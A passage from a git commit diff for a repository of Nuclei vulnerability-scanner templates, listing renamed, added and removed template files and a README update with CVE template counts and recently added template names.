nuclei-templates/Other/webview-javascript-11178.yaml delete mode 100644 nuclei-templates/Other/webview-javascript.yaml create mode 100644 nuclei-templates/Other/webview-load-url-11181.yaml delete mode 100644 nuclei-templates/Other/webview-load-url-11182.yaml create mode 100644 nuclei-templates/Other/wechat.yaml delete mode 100644 nuclei-templates/Other/weiphp-sql-injection-11190.yaml create mode 100644 nuclei-templates/Other/weiphp-sql-injection.yaml create mode 100644 nuclei-templates/Other/wems-manager-xss-11191.yaml delete mode 100644 nuclei-templates/Other/wems-manager-xss.yaml rename nuclei-templates/Other/{werkzeug-debugger-detect.yaml => werkzeug-debugger-detect-11196.yaml} (100%) create mode 100644 nuclei-templates/Other/whatsup_gold.yaml rename nuclei-templates/Other/{wifisky-default-login-11201.yaml => wifisky-default-login-11204.yaml} (100%) mode change 100755 => 100644 nuclei-templates/Other/wifisky-default-password.yaml rename nuclei-templates/Other/{wildfly-panel.yaml => wildfly-panel-11211.yaml} (100%) create mode 100644 nuclei-templates/Other/window-name-domxss-11213.yaml delete mode 100644 nuclei-templates/Other/window-name-domxss.yaml delete mode 100644 nuclei-templates/Other/windows-lfi-fuzz.yaml rename nuclei-templates/Other/{wishpond-takeover.yaml => wishpond-takeover-11217.yaml} (100%) rename nuclei-templates/Other/{wix-takeover.yaml => wix-takeover-11220.yaml} (100%) create mode 100644 nuclei-templates/Other/wn604.yaml rename nuclei-templates/Other/{wondercms-detect.yaml => wondercms-detect-11222.yaml} (100%) rename nuclei-templates/Other/{wooyun-2015-148227.yaml => wooyun-2015-148227-11227.yaml} (100%) create mode 100644 nuclei-templates/Other/wooyun-path-traversal-11229.yaml delete mode 100644 nuclei-templates/Other/wooyun-path-traversal.yaml delete mode 100644 nuclei-templates/Other/wordpress-LFI.yaml create mode 100644 nuclei-templates/Other/wordpress-accessible-wpconfig-11236.yaml delete mode 100644 nuclei-templates/Other/wordpress-accessible-wpconfig.yaml rename nuclei-templates/Other/{wordpress-affiliatewp-log-11242.yaml => wordpress-affiliatewp-log-11243.yaml} (100%) rename nuclei-templates/Other/{wordpress-db-backup-listing-11250.yaml => wordpress-db-backup-listing-11248.yaml} (100%) rename nuclei-templates/Other/{wordpress-debug-log-11259.yaml => wordpress-debug-log-11258.yaml} (100%) create mode 100644 nuclei-templates/Other/wordpress-directory-listing-11262.yaml delete mode 100644 nuclei-templates/Other/wordpress-directory-listing-11263.yaml create mode 100644 nuclei-templates/Other/wordpress-emails-verification-for-woocommerce-1.yaml rename nuclei-templates/Other/{wordpress-emergency-script.yaml => wordpress-emergency-script-11272.yaml} (100%) rename nuclei-templates/Other/{wordpress-git-config-11278.yaml => wordpress-git-config-11279.yaml} (100%) delete mode 100644 nuclei-templates/Other/wordpress-gotmls-detect-11280.yaml create mode 100644 nuclei-templates/Other/wordpress-gotmls-detect.yaml create mode 100644 nuclei-templates/Other/wordpress-infinitewp-auth-bypass-11285.yaml delete mode 100644 nuclei-templates/Other/wordpress-infinitewp-auth-bypass.yaml delete mode 100644 nuclei-templates/Other/wordpress-installer-log-11290.yaml create mode 100644 nuclei-templates/Other/wordpress-installer-log.yaml create mode 100644 nuclei-templates/Other/wordpress-lfi(1).yaml rename nuclei-templates/Other/{wordpress-login.yaml => wordpress-login-11295.yaml} (100%) create mode 100644 nuclei-templates/Other/wordpress-plugins-detect-11298.yaml delete mode 100644 nuclei-templates/Other/wordpress-plugins-detect.yaml create mode 100644 nuclei-templates/Other/wordpress-registration-enabled.yaml rename nuclei-templates/Other/{WP_json_caching.yaml => wordpress-rest-dosviacp.yaml} (100%) rename nuclei-templates/Other/{wordpress-rce-simplefilelist.yaml => wordpress-simplefilelist-rce.yaml} (100%) delete mode 100644 nuclei-templates/Other/wordpress-takeover-11313.yaml create mode 100644 nuclei-templates/Other/wordpress-takeover.yaml create mode 100644 nuclei-templates/Other/wordpress-tmm-db-migrate-11317.yaml delete mode 100644 nuclei-templates/Other/wordpress-tmm-db-migrate-11320.yaml delete mode 100644 nuclei-templates/Other/wordpress-updraftplus-pem-key-11328.yaml create mode 100644 nuclei-templates/Other/wordpress-updraftplus-pem-key.yaml rename nuclei-templates/Other/{wordpress-weak-credentials-11336.yaml => wordpress-weak-credentials-11334.yaml} (100%) rename nuclei-templates/Other/{wordpress-woocommerce-listing.yaml => wordpress-woocommerce-listing-11341.yaml} (100%) create mode 100644 nuclei-templates/Other/wordpress-woocommerce-sqli-11343.yaml delete mode 100644 nuclei-templates/Other/wordpress-woocommerce-sqli.yaml rename nuclei-templates/Other/{woosidebars.yaml => wordpress-woosidebars.yaml} (100%) delete mode 100644 nuclei-templates/Other/wordpress-wordfence-lfi-11349.yaml create mode 100644 nuclei-templates/Other/wordpress-wordfence-lfi-11351.yaml create mode 100644 nuclei-templates/Other/wordpress-wordfence-waf-bypass-xss-11354.yaml delete mode 100644 nuclei-templates/Other/wordpress-wordfence-waf-bypass-xss.yaml create mode 100644 nuclei-templates/Other/wordpress-wordfence-xss-11359.yaml delete mode 100644 nuclei-templates/Other/wordpress-wordfence-xss.yaml rename nuclei-templates/Other/{wordpress-workflow.yaml => wordpress-workflow-11366.yaml} (100%) rename nuclei-templates/Other/{wordpress-wpcourses-info-disclosure.yaml => wordpress-wpcourses-info-disclosure-11367.yaml} (100%) create mode 100644 nuclei-templates/Other/wordpress-xmlrpc-brute-force.yaml create mode 100644 nuclei-templates/Other/wordpress-zebra-form-xss-11378.yaml delete mode 100644 nuclei-templates/Other/wordpress-zebra-form-xss.yaml create mode 100644 nuclei-templates/Other/worksites-detection-11385.yaml delete mode 100644 nuclei-templates/Other/worksites-detection.yaml rename nuclei-templates/Other/{worksites-takeover.yaml => worksites-takeover-11388.yaml} (100%) create mode 100644 nuclei-templates/Other/wowza-streaming-engine-11399.yaml delete mode 100644 nuclei-templates/Other/wowza-streaming-engine.yaml delete mode 100644 nuclei-templates/Other/wp-123contactform-plugin-listing-11400.yaml create mode 100644 nuclei-templates/Other/wp-123contactform-plugin-listing.yaml delete mode 100644 nuclei-templates/Other/wp-altair-listing-11405.yaml create mode 100644 nuclei-templates/Other/wp-altair-listing.yaml delete mode 100644 nuclei-templates/Other/wp-ambience-xss-11407.yaml create mode 100644 nuclei-templates/Other/wp-ambience-xss-11410.yaml rename nuclei-templates/Other/{wp-app-log.yaml => wp-app-log-11411.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-arforms-listing-11415.yaml delete mode 100644 nuclei-templates/Other/wp-arforms-listing.yaml rename nuclei-templates/Other/{wp-church-admin-xss-11420.yaml => wp-church-admin-xss-11422.yaml} (100%) rename nuclei-templates/Other/{wp-custom-tables-xss.yaml => wp-custom-tables-xss-11435.yaml} (100%) rename nuclei-templates/Other/{wp-finder-xss.yaml => wp-finder-xss-11448.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-flagem-xss-11451.yaml delete mode 100644 nuclei-templates/Other/wp-flagem-xss.yaml create mode 100644 nuclei-templates/Other/wp-grimag-open-redirect-11460.yaml delete mode 100644 nuclei-templates/Other/wp-grimag-open-redirect.yaml delete mode 100644 nuclei-templates/Other/wp-gtranslate-open-redirect-11466.yaml create mode 100644 nuclei-templates/Other/wp-gtranslate-open-redirect.yaml rename nuclei-templates/Other/{wp-idx-broker-platinum-listing.yaml => wp-idx-broker-platinum-listing-11471.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-install-11473.yaml delete mode 100644 nuclei-templates/Other/wp-install.yaml create mode 100644 nuclei-templates/Other/wp-iwp-client-listing-11476.yaml delete mode 100644 nuclei-templates/Other/wp-iwp-client-listing.yaml create mode 100644 nuclei-templates/Other/wp-knews-xss-11488.yaml delete mode 100644 nuclei-templates/Other/wp-knews-xss.yaml create mode 100644 nuclei-templates/Other/wp-license-file-11489.yaml delete mode 100644 nuclei-templates/Other/wp-license-file.yaml create mode 100644 nuclei-templates/Other/wp-mailchimp-log-exposure-11494.yaml delete mode 100644 nuclei-templates/Other/wp-mailchimp-log-exposure.yaml create mode 100644 nuclei-templates/Other/wp-memphis-documents-library-lfi-11497.yaml delete mode 100644 nuclei-templates/Other/wp-memphis-documents-library-lfi.yaml create mode 100644 nuclei-templates/Other/wp-misconfig.yaml rename nuclei-templates/Other/{wp-mstore-plugin-listing.yaml => wp-mstore-plugin-listing-11501.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-multiple-theme-ssrf-11511.yaml delete mode 100644 nuclei-templates/Other/wp-multiple-theme-ssrf.yaml create mode 100644 nuclei-templates/Other/wp-nextgen-xss-11517.yaml delete mode 100644 nuclei-templates/Other/wp-nextgen-xss.yaml create mode 100644 nuclei-templates/Other/wp-oxygen-theme-lfi-11521.yaml delete mode 100644 nuclei-templates/Other/wp-oxygen-theme-lfi-11523.yaml create mode 100644 nuclei-templates/Other/wp-phpfreechat-xss-11524.yaml delete mode 100644 nuclei-templates/Other/wp-phpfreechat-xss-11527.yaml rename nuclei-templates/Other/{wp-plugin-1-flashgallery-listing.yaml => wp-plugin-1-flashgallery-listing-11530.yaml} (100%) rename nuclei-templates/Other/{wp-plugin-lifterlms.yaml => wp-plugin-lifterlms-11535.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-prostore-open-redirect-11550.yaml delete mode 100644 nuclei-templates/Other/wp-prostore-open-redirect.yaml create mode 100644 nuclei-templates/Other/wp-securimage-xss-11557.yaml delete mode 100644 nuclei-templates/Other/wp-securimage-xss.yaml delete mode 100644 nuclei-templates/Other/wp-sfwd-lms-listing-11562.yaml create mode 100644 nuclei-templates/Other/wp-sfwd-lms-listing-11565.yaml delete mode 100644 nuclei-templates/Other/wp-simple-fields-lfi-11568.yaml create mode 100644 nuclei-templates/Other/wp-simple-fields-lfi-11571.yaml rename nuclei-templates/Other/{wp-slideshow-xss-11576.yaml => wp-slideshow-xss-11574.yaml} (100%) rename nuclei-templates/Other/{wp-socialfit-xss-11582.yaml => wp-socialfit-xss-11581.yaml} (100%) delete mode 100644 nuclei-templates/Other/wp-super-forms-11588.yaml create mode 100644 nuclei-templates/Other/wp-super-forms.yaml create mode 100644 nuclei-templates/Other/wp-test-email.yaml rename nuclei-templates/Other/{wp-tutor-lfi-11601.yaml => wp-tutor-lfi-11596.yaml} (100%) create mode 100644 nuclei-templates/Other/wp-upload-data-11604.yaml delete mode 100644 nuclei-templates/Other/wp-upload-data.yaml delete mode 100644 nuclei-templates/Other/wp-userenum.yaml delete mode 100644 nuclei-templates/Other/wp-vault-lfi-11611.yaml create mode 100644 nuclei-templates/Other/wp-vault-lfi-11612.yaml create mode 100644 nuclei-templates/Other/wp-woocommerce-email-verification-11616.yaml delete mode 100644 nuclei-templates/Other/wp-woocommerce-email-verification.yaml rename nuclei-templates/Other/{wp-woocommerce-file-download.yaml => wp-woocommerce-file-download-11620.yaml} (100%) rename nuclei-templates/Other/{wp-xmlrpc-11629.yaml => wp-xmlrpc-11631.yaml} (100%) delete mode 100644 nuclei-templates/Other/wp-xmlrpc-brute-force.yaml create mode 100644 nuclei-templates/Other/wp-xmlrpc-pingback-detection-11628.yaml delete mode 100644 nuclei-templates/Other/wp-xmlrpc-pingback-detection.yaml create mode 100644 nuclei-templates/Other/wpconfig.yaml rename nuclei-templates/Other/{wp-engine-config.yaml => wpengine-config-check.yaml} (100%) rename nuclei-templates/Other/{wpmudev-my-calender-xss.yaml => wpmudev-my-calender-xss-11502.yaml} (100%) create mode 100644 nuclei-templates/Other/wpmudev-pub-keys-11504.yaml delete mode 100644 nuclei-templates/Other/wpmudev-pub-keys.yaml delete mode 100644 nuclei-templates/Other/wptouch-open-redirect-11594.yaml create mode 100644 nuclei-templates/Other/wptouch-open-redirect-11595.yaml create mode 100644 nuclei-templates/Other/wptouch-plugin-open-redirect.yaml delete mode 100644 nuclei-templates/Other/wsdl-api-11632.yaml create mode 100644 nuclei-templates/Other/wsdl-api.yaml create mode 100644 nuclei-templates/Other/wso2-2019-0598-11635.yaml create mode 100644 nuclei-templates/Other/wso2-management-console-11645.yaml delete mode 100644 nuclei-templates/Other/wso2-management-console.yaml create mode 100644 nuclei-templates/Other/wuzhicms-sqli-11659.yaml delete mode 100644 nuclei-templates/Other/wuzhicms-sqli.yaml create mode 100644 nuclei-templates/Other/x-ui.yaml create mode 100644 nuclei-templates/Other/xampp-default-page-11662.yaml delete mode 100644 nuclei-templates/Other/xampp-default-page-11663.yaml rename nuclei-templates/Other/{xdcms-sqli.yaml => xdcms-sqli-11666.yaml} (100%) create mode 100644 nuclei-templates/Other/xds-amr-status-11669.yaml delete mode 100644 nuclei-templates/Other/xds-amr-status.yaml rename nuclei-templates/Other/{xenforo-login.yaml => xenforo-login-11670.yaml} (100%) delete mode 100644 nuclei-templates/Other/xenmobile-login-11677.yaml create mode 100644 nuclei-templates/Other/xenmobile-login.yaml create mode 100644 nuclei-templates/Other/xenmobile_server.yaml delete mode 100644 nuclei-templates/Other/xerox-efi-lfi-11682.yaml create mode 100644 nuclei-templates/Other/xerox-efi-lfi-11683.yaml create mode 100644 nuclei-templates/Other/xerox7-default-login-11678.yaml delete mode 100644 nuclei-templates/Other/xerox7-default-login.yaml delete mode 100644 nuclei-templates/Other/xml-schema-detect-11691.yaml create mode 100644 nuclei-templates/Other/xml-schema-detect.yaml create mode 100644 nuclei-templates/Other/xnat.yaml rename nuclei-templates/Other/{xp-webcam-11698.yaml => xp-webcam-11697.yaml} (100%) create mode 100644 nuclei-templates/Other/xprober-service-11694.yaml delete mode 100644 nuclei-templates/Other/xprober-service.yaml delete mode 100644 nuclei-templates/Other/xsstest.yaml create mode 100644 nuclei-templates/Other/xvr-login-11704.yaml delete mode 100644 nuclei-templates/Other/xvr-login.yaml rename nuclei-templates/Other/{xxljob-admin-detect.yaml => xxljob-admin-detect-11708.yaml} (100%) delete mode 100644 nuclei-templates/Other/xxljob-default-login-11711.yaml create mode 100644 nuclei-templates/Other/xxljob-default-login-11714.yaml rename nuclei-templates/Other/{yapi-detect-11720.yaml => yapi-detect-11719.yaml} (100%) rename nuclei-templates/Other/{yapi-rce.yaml => yapi-rce-11724.yaml} (100%) create mode 100644 nuclei-templates/Other/yarn-lock-11728.yaml delete mode 100644 nuclei-templates/Other/yarn-lock.yaml delete mode 100644 nuclei-templates/Other/yarn-manager-exposure-11733.yaml create mode 100644 nuclei-templates/Other/yarn-manager-exposure.yaml delete mode 100644 nuclei-templates/Other/yarn-resourcemanager-rce-11735.yaml create mode 100644 nuclei-templates/Other/yarn-resourcemanager-rce.yaml create mode 100644 nuclei-templates/Other/yeswiki.yaml create mode 100644 nuclei-templates/Other/yii-debugger-11738.yaml delete mode 100644 nuclei-templates/Other/yii-debugger.yaml rename nuclei-templates/Other/{yishaadmin-lfi.yaml => yishaadmin-lfi-11744.yaml} (100%) delete mode 100644 nuclei-templates/Other/yongyou-ICurrtype-sqli.yaml create mode 100644 nuclei-templates/Other/yongyou-jdbcread.yaml rename nuclei-templates/Other/{yonyou-u8-registerservlet-sqli.yaml => yongyou-u8-RegisterServlet-sql-Injection.yaml} (100%) rename nuclei-templates/Other/{yongyou-u8-oa-sqli.yaml => yongyou-u8-oa-sqli-11747.yaml} (100%) rename nuclei-templates/Other/{yonyou-nc-cloud-ncchr-attachment-uploadChunk-fileupload.yaml => yonyou_nc_cloud_ncchr_attachment_uploadchunk_upload.yaml} (100%) rename nuclei-templates/Other/{yopass-panel.yaml => yopass-panel-11749.yaml} (100%) rename nuclei-templates/Other/{yunxintong-fileRead.yaml => yunxintong-fileread.yaml} (100%) delete mode 100644 nuclei-templates/Other/yzmcms-detect-11751.yaml create mode 100644 nuclei-templates/Other/yzmcms-detect.yaml rename nuclei-templates/Other/{zabbix-default-login-11762.yaml => zabbix-default-login.yaml} (100%) create mode 100644 nuclei-templates/Other/zcms-v3-sqli-11775.yaml delete mode 100644 nuclei-templates/Other/zcms-v3-sqli.yaml create mode 100644 nuclei-templates/Other/zenphoto-installation-sensitive-info-1.yaml create mode 100644 nuclei-templates/Other/zenphoto-installation-sensitive-info-2.yaml create mode 100644 nuclei-templates/Other/zenphoto-installation-sensitive-info-3.yaml create mode 100644 nuclei-templates/Other/zenphoto-installation-sensitive-info-4.yaml rename nuclei-templates/Other/{zentao-detect-11787.yaml => zentao-detect-11785.yaml} (100%) create mode 100644 nuclei-templates/Other/zentao.yaml delete mode 100644 nuclei-templates/Other/zhiyuan-file-upload-11791.yaml create mode 100644 nuclei-templates/Other/zhiyuan-file-upload.yaml create mode 100644 nuclei-templates/Other/zhiyuan-oa-info-leak-11799.yaml delete mode 100644 nuclei-templates/Other/zhiyuan-oa-info-leak.yaml rename nuclei-templates/Other/{zhiyuan-oa-unauthorized-11808.yaml => zhiyuan-oa-unauthorized-11806.yaml} (100%) delete mode 100644 nuclei-templates/Other/zimbra-preauth-ssrf-11811.yaml create mode 100644 nuclei-templates/Other/zimbra-preauth-ssrf.yaml delete mode 100644 nuclei-templates/Other/zip-backup-files-11819.yaml create mode 100644 nuclei-templates/Other/zip-backup-files-11820.yaml delete mode 100644 nuclei-templates/Other/zm-system-log-detect-11833.yaml create mode 100644 nuclei-templates/Other/zm-system-log-detect-11834.yaml create mode 100644 nuclei-templates/Other/zmanda-default-login-11825.yaml delete mode 100644 nuclei-templates/Other/zmanda-default-login.yaml delete mode 100644 nuclei-templates/Other/zms-auth-bypass-11830.yaml create mode 100644 nuclei-templates/Other/zms-auth-bypass.yaml create mode 100644 nuclei-templates/Other/zte-panel-11840.yaml delete mode 100644 nuclei-templates/Other/zte-panel.yaml create mode 100644 nuclei-templates/Other/zuul-panel-11843.yaml delete mode 100644 nuclei-templates/Other/zuul-panel.yaml diff --git a/README.md b/README.md index ae70cc2c39..1dfb857ec9 100644 --- a/README.md +++ b/README.md @@ -13,40 +13,374 @@ | CVE-2009 | 45 | | CVE-2010 | 139 | | CVE-2011 | 91 | -| CVE-2012 | 145 | +| CVE-2012 | 146 | | CVE-2013 | 169 | | CVE-2014 | 422 | -| CVE-2015 | 527 | +| CVE-2015 | 528 | | CVE-2016 | 249 | -| CVE-2017 | 395 | +| CVE-2017 | 397 | | CVE-2018 | 446 | | CVE-2019 | 514 | -| CVE-2020 | 594 | -| CVE-2021 | 1731 | -| CVE-2022 | 2466 | -| CVE-2023 | 4756 | -| CVE-2024 | 4993 | -| Other | 23918 | +| CVE-2020 | 593 | +| CVE-2021 | 1734 | +| CVE-2022 | 2470 | +| CVE-2023 | 4759 | +| CVE-2024 | 5042 | +| Other | 24279 | ## 近几天数量变化情况 -|2024-09-07 | 2024-09-08 | 2024-09-09 | 2024-09-10 | 2024-09-11 | 2024-09-12 | 2024-09-13| +|2024-09-08 | 2024-09-09 | 2024-09-10 | 2024-09-11 | 2024-09-12 | 2024-09-13 | 2024-09-14| |--- | ------ | ------ | ------ | ------ | ------ | ---| -|41788 | 41796 | 41798 | 41800 | 41825 | 41851 | 41783| +|41796 | 41798 | 41800 | 41825 | 41851 | 41783 | 42206| ## 最近新增文件 | templates name | | --- | -| cve-2019-17503.yaml | -| cve-2019-5127.yaml | -| cve-2018-1000671.yaml | -| cve-2017-7269.yaml | -| kubernetes-api-detect.yaml | -| opengear-detect.yaml | -| 403-bypass_method.yaml | -| generic-rfi.yaml | -| parametros-preguicosos.yaml | -| exposed-pii.yaml | -| 403-bypass_xrewriteurl.yaml | -| 403-bypass_xheaders.yaml | -| setPreferences-xss.yaml | -| contact-form-7-plugin.yaml | -| SquirrelMail.yaml | -| cve-2020-11547.yaml | +| CVE-2024-8730.yaml | +| CVE-2024-7888.yaml | +| CVE-2024-5870.yaml | +| CVE-2024-8522.yaml | +| CVE-2024-3899.yaml | +| CVE-2024-45625.yaml | +| CVE-2024-5628.yaml | +| CVE-2024-8269.yaml | +| CVE-2024-6792.yaml | +| CVE-2024-8732.yaml | +| CVE-2024-6889.yaml | +| CVE-2024-45270.yaml | +| CVE-2024-8031.yaml | +| CVE-2024-7132.yaml | +| CVE-2024-8663.yaml | +| CVE-2024-7423.yaml | +| CVE-2024-6910.yaml | +| CVE-2024-8622.yaml | +| CVE-2024-8747.yaml | +| CVE-2024-6544.yaml | +| CVE-2024-8734.yaml | +| CVE-2024-7354.yaml | +| CVE-2024-8665.yaml | +| CVE-2024-8664.yaml | +| CVE-2024-37084.yaml | +| CVE-2024-8656.yaml | +| CVE-2024-7955.yaml | +| CVE-2024-8731.yaml | +| CVE-2024-6888.yaml | +| CVE-2024-5867.yaml | +| CVE-2024-7716.yaml | +| CVE-2024-45429.yaml | +| CVE-2024-45269.yaml | +| CVE-2024-5561.yaml | +| CVE-2024-41667.yaml | +| CVE-2024-5789.yaml | +| CVE-2024-8742.yaml | +| CVE-2024-7891.yaml | +| CVE-2024-8242.yaml | +| CVE-2024-3673.yaml | +| CVE-2024-8529.yaml | +| CVE-2024-23167.yaml | +| CVE-2024-5869.yaml | +| CVE-2024-5567.yaml | +| CVE-2024-8714.yaml | +| CVE-2024-5884.yaml | +| CVE-2024-6020.yaml | +| CVE-2024-8737.yaml | +| CVE-2022-2446.yaml | +| azure-postgres-log-connections-disabled.yaml | +| azure-apim-public-access-disabled.yaml | +| azure-sql-auditing-disabled.yaml | +| application_security_gateway.yaml | +| aruba_instant.yaml | +| jbpm.yaml | +| leira-roles.yaml | +| azure-storage-account-update-unalerted.yaml | +| azure-entra-id-guest-users-unmonitored.yaml | +| azure-storage-table-logging-disabled.yaml | +| azure-storage-overly-permissive-sap.yaml | +| azure-storage-private-endpoint-unconfigured.yaml | +| azure-keyvault-recoverability-unconfigured.yaml | +| vrealize_operations_manager.yaml | +| azure-vm-entra-id-unenabled.yaml | +| shopxo.yaml | +| azure-lb-create-update-missing.yaml | +| fortiportal.yaml | +| azure-sql-va-emails-unconfigured.yaml | +| azure-vm-delete-unalerted.yaml | +| bagisto.yaml | +| 3cx.yaml | +| azure-postgres-connection-throttling-disabled.yaml | +| nifi.yaml | +| azure-functionapp-public-exposure.yaml | +| pelco_videoxpert.yaml | +| azure-postgresql-ssl-enforcement.yaml | +| azure-storage-queue-logging-disabled.yaml | +| hg255s.yaml | +| cloudstack.yaml | +| s14.yaml | +| azure-keyvault-network-unrestricted.yaml | +| office_anywhere.yaml | +| azure-vm-tags-schema-noncompliant.yaml | +| seeddms.yaml | +| azure-aks-kubernetes-version-outdated.yaml | +| azure-app-tier-vm-disk-unencrypted.yaml | +| hue.yaml | +| azure-appservice-auth-disabled.yaml | +| azure-vm-create-update-unalerted.yaml | +| azure-vm-deallocate-unalerted.yaml | +| flexnet_publisher.yaml | +| azure-redis-nonssl-port-disabled.yaml | +| azure-lb-unused.yaml | +| fumengyun-sqli.yaml | +| azure-diag-logs-not-enabled.yaml | +| froxlor.yaml | +| azure-sql-failover-not-enabled.yaml | +| azure-keyvault-audit-not-enabled.yaml | +| tooljet.yaml | +| azure-appservice-always-on-disabled.yaml | +| azure-vm-ssh-auth-type.yaml | +| azure-vmss-auto-os-upgrade-missing.yaml | +| azure-openai-cmk-not-enabled.yaml | +| steve.yaml | +| azure-functionapp-access-keys-missing.yaml | +| wazuh.yaml | +| xnat.yaml | +| azure-blob-anonymous-access-disabled.yaml | +| azure-servicebus-public-access-disabled.yaml | +| logstash.yaml | +| azure-blob-soft-delete-disabled.yaml | +| azure-functionapp-admin-privileges.yaml | +| kio_firmware.yaml | +| azure-postgresql-db-delete-unalerted.yaml | +| azure-custom-admin-role-unrestricted.yaml | +| azure-delete-lb-alert-unconfigured.yaml | +| azure-vm-unmanaged-disk-volumes.yaml | +| data_science_studio.yaml | +| kiwi_tcms.yaml | +| azure-vm-managed-identity-unassigned.yaml | +| vrealize_operations.yaml | +| vpn.yaml | +| x-ui.yaml | +| netman_204_firmware.yaml | +| azure-public-ip-delete-unalerted.yaml | +| azure-keyvault-cert-keytype-unapproved.yaml | +| azure-vm-guest-diagnostics-unenabled.yaml | +| g0.yaml | +| azure-vmss-public-ip-disabled.yaml | +| t24.yaml | +| azure-vm-standard-ssd-required.yaml | +| kingsoft_antivirus.yaml | +| unified_communications_domain_manager.yaml | +| azure-search-service-managed-identity-disabled.yaml | +| azure-storage-min-tls-version.yaml | +| network_security_manager.yaml | +| ckan.yaml | +| vcenter_server.yaml | +| traccar.yaml | +| dns-320l.yaml | +| azure-custom-owner-role-unrestricted.yaml | +| azure-postgresql-db-update-unalerted.yaml | +| azure-apim-nv-plaintext-exposure.yaml | +| azure-keyvault-ssl-autorenewal-missing.yaml | +| email-obfuscate-shortcode.yaml | +| senayan_library_management_system.yaml | +| azure-appservice-http2-not-enabled.yaml | +| azure-db-mysql-delete-unalerted.yaml | +| azure-postgres-log-duration-disabled.yaml | +| streampipes.yaml | +| websphere.yaml | +| azure-keyvault-update-unalerted.yaml | +| azure-redis-tls-version-outdated.yaml | +| clickshare_cs-100_huddle_firmware.yaml | +| rundeck.yaml | +| crmeb.yaml | +| remote_support.yaml | +| azure-vmss-auto-repairs-disabled.yaml | +| azure-appservice-remote-debugging-enabled.yaml | +| pdf-thumbnail-generator.yaml | +| azure-sql-tde-not-enabled.yaml | +| azure-postgresql-storage-autogrow-disabled.yaml | +| azure-cosmosdb-auto-failover-missing.yaml | +| azure-aks-managed-identity-unassigned.yaml | +| azure-nsg-rule-update-unalerted.yaml | +| gnuboard5.yaml | +| sigma_wide.yaml | +| delicate.yaml | +| wechat.yaml | +| azure-cosmosdb-default-network-access-unrestricted.yaml | +| vec40g.yaml | +| azure-security-policy-update-unalerted.yaml | +| cs141.yaml | +| azure-sql-fw-rule-unalerted.yaml | +| webex_meetings_online.yaml | +| leira-cron-jobs.yaml | +| webpagetest.yaml | +| azure-appservice-client-cert-disabled.yaml | +| azure-appservice-insights-not-enabled.yaml | +| azure-diagnostic-categories-misconfigured.yaml | +| azure-policy-not-allowed-types-unassigned.yaml | +| azure-blob-lifecycle-not-enabled.yaml | +| azure-functionapp-system-assigned-missing.yaml | +| sangfor.yaml | +| azure-vmss-health-monitoring-missing.yaml | +| tamronos.yaml | +| aj-report.yaml | +| azure-aks-not-user-assigned.yaml | +| magnolia_cms.yaml | +| usg1000_firmware.yaml | +| azure-sql-mi-tls-version-outdated.yaml | +| azure-blob-immutable-not-enabled.yaml | +| azure-postgres-log-disconnections-disabled.yaml | +| azure-security-solution-delete-unalerted.yaml | +| azure-security-solutions-update-unalerted.yaml | +| azure-blob-service-logging-disabled.yaml | +| telerik_report_server.yaml | +| azure-vm-endpoint-protection-missing.yaml | +| prison_management_system.yaml | +| azure-storage-trusted-access-disabled.yaml | +| azkaban.yaml | +| azure-keyvault-resource-lock-check.yaml | +| elfinder.yaml | +| cloud_foundation.yaml | +| azure-mfa-not-enabled-privileged-users.yaml | +| notebook.yaml | +| azure-synapse-sqlpool-tde-disabled.yaml | +| azure-storage-cmk-not-used.yaml | +| rg-uac_firmware.yaml | +| azure-public-ip-update-unalerted.yaml | +| azure-nic-ip-forwarding-check.yaml | +| azure-sql-db-update-unalerted.yaml | +| azure-storage-secure-transfer.yaml | +| azure-aks-api-version-not-latest.yaml | +| azure-vmss-termination-notif-disabled.yaml | +| office_web_apps_server.yaml | +| azure-aks-api-unrestricted.yaml | +| azure-database-tier-cmk-absent.yaml | +| azure-vm-unapproved-image.yaml | +| self_service.yaml | +| azure-vm-boot-disk-unencrypted.yaml | +| rt-n16.yaml | +| azure-storage-public-access.yaml | +| azure-vmss-empty-unattached.yaml | +| unifi_network_application.yaml | +| azure-apim-tls-config-weak.yaml | +| azure-apim-https-enforcement-missing.yaml | +| azure-sql-database-rename-unalerted.yaml | +| azure-postgres-allow-azure-services-disabled.yaml | +| experience_manager_cloud_service.yaml | +| azure-aks-cni-not-configured.yaml | +| azure-iam-role-resource-lock-unassigned.yaml | +| azure-storage-cross-tenant-replication-disabled.yaml | +| ollama.yaml | +| integrated_management_module.yaml | +| cdg.yaml | +| azure-aks-use-private-kv.yaml | +| azure-disk-encryption-unattached-volumes.yaml | +| wp-test-email.yaml | +| o2oa.yaml | +| azure-storage-blob-public-access.yaml | +| azure-appservice-backup-retention-missing.yaml | +| azure-vnet-ddos-protection.yaml | +| triton-lite.yaml | +| floating-contact.yaml | +| custom-post-limits.yaml | +| datahub.yaml | +| azure-storage-network-unrestricted.yaml | +| openmediavault.yaml | +| dzzoffice.yaml | +| scx-6555n.yaml | +| azure-defender-auto-provisioning-disabled.yaml | +| whatsup_gold.yaml | +| endpoint_protection_manager.yaml | +| cercopitheque.yaml | +| azure-storage-encryption-missing.yaml | +| azure-openai-private-endpoints-unconfigured.yaml | +| azure-vm-accelerated-networking-disabled.yaml | +| e-cology.yaml | +| manageengine_netflow_analyzer.yaml | +| azure-apim-http2-not-enabled.yaml | +| azure-postgres-double-encryption-disabled.yaml | +| apeosport-v_c3375.yaml | +| azure-functionapp-vnet-integration-missing.yaml | +| azure-appservice-entra-id-missing.yaml | +| dir-845l.yaml | +| wn604.yaml | +| azure-apim-user-assigned-id-not-used.yaml | +| azure-keyvault-trusted-ms-unrestricted.yaml | +| karaf.yaml | +| azure-storage-static-website-review.yaml | +| azure-sql-mi-tde-cmk-not-enabled.yaml | +| azure-storage-byok-not-used.yaml | +| azure-keyvault-certificate-insufficient-autorenew.yaml | +| neighborly.yaml | +| azure-appservice-tls-latest-version-missing.yaml | +| azure-appservice-https-only-not-enforced.yaml | +| argo_cd.yaml | +| azure-vmss-load-balancer-unassociated.yaml | +| azure-vm-trusted-launch-disabled.yaml | +| azure-monitor-diagnostic-unrestricted.yaml | +| azure-nsg-delete-unalerted.yaml | +| yeswiki.yaml | +| azure-aks-network-contrib-unassigned.yaml | +| azure-openai-managed-identity-not-used.yaml | +| camera_firmware.yaml | +| etl3100.yaml | +| voyager.yaml | +| aura_utility_services.yaml | +| openshift_origin.yaml | +| ns-asg.yaml | +| dataease.yaml | +| azure-apim-resource-logs-not-configured.yaml | 